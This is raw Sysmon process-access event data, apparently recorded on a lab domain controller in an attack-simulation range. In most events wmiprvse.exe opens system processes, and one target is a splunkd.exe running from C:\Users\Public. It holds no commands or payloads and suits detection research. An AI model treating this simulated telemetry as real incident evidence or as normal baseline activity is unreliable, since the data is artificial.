16:00:15.490{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028643Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.490{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028642Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.490{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028641Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.490{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028640Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.490{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028639Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.490{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028638Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.490{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028637Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.490{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028636Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.490{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028635Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.490{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028634Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.490{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028633Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.474{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028632Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.474{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028631Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.474{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028630Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.474{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028629Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.474{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028628Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.474{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028627Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.474{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028626Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.474{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028625Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.474{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028624Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 